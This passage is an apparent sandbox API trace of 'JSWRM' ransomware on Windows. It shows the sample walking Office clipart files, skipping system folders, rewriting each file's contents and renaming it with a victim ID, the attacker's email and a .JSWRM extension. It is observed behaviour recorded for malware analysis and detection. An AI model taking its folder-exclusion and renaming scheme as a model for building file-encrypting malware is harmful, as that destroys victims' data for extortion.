nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2d70, lpOverlapped=0x0) returned 1 [0074.447] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.447] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2d70, lpOverlapped=0x0) returned 1 [0074.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.447] CloseHandle (hObject=0x460) returned 1 [0074.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0074.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0074.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.448] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x57f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD00160_.WMF", cAlternateFileName="")) returned 1 [0074.448] lstrcmpiW (lpString1="BD00160_.WMF", lpString2=".") returned 1 [0074.448] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="..") returned 1 [0074.448] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="...") returned 1 [0074.448] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="windows") returned -1 [0074.449] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="recovery") returned -1 [0074.449] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="perflogs") returned -1 [0074.449] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="documents and settings") returned -1 [0074.449] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.449] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="system volume information") returned -1 [0074.449] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="msocache") returned -1 [0074.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0074.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00160_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00160_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00160_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0074.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0074.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00160_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00160_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00160_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0074.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.449] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22516) returned 1 [0074.449] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x57f0) returned 0x24c1d0 [0074.449] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x57f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x57f0, lpOverlapped=0x0) returned 1 [0074.452] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.452] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x57f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x57f0, lpOverlapped=0x0) returned 1 [0074.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.452] CloseHandle (hObject=0x460) returned 1 [0074.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0074.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0074.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0074.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0074.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0074.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.453] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0074.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.454] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f34, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD00173_.WMF", cAlternateFileName="")) returned 1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2=".") returned 1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="..") returned 1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="...") returned 1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="windows") returned -1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="recovery") returned -1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="perflogs") returned -1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="documents and settings") returned -1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="system volume information") returned -1 [0074.454] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="msocache") returned -1 [0074.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0074.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00173_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00173_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00173_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0074.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00173_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00173_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00173_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.455] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16180) returned 1 [0074.455] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f30) returned 0x24c1d0 [0074.455] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3f30, lpOverlapped=0x0) returned 1 [0074.457] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.457] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3f30, lpOverlapped=0x0) returned 1 [0074.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.457] CloseHandle (hObject=0x460) returned 1 [0074.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0074.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0074.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0074.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0074.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0074.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.459] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4354, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD05119_.WMF", cAlternateFileName="")) returned 1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2=".") returned 1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="..") returned 1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="...") returned 1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="windows") returned -1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="recovery") returned -1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="perflogs") returned -1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="documents and settings") returned -1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="system volume information") returned -1 [0074.459] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="msocache") returned -1 [0074.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD05119_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD05119_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD05119_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD05119_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD05119_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD05119_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.460] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17236) returned 1 [0074.460] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4350) returned 0x24c1d0 [0074.460] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4350, lpOverlapped=0x0) returned 1 [0074.463] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.463] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4350, lpOverlapped=0x0) returned 1 [0074.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.463] CloseHandle (hObject=0x460) returned 1 [0074.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0074.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 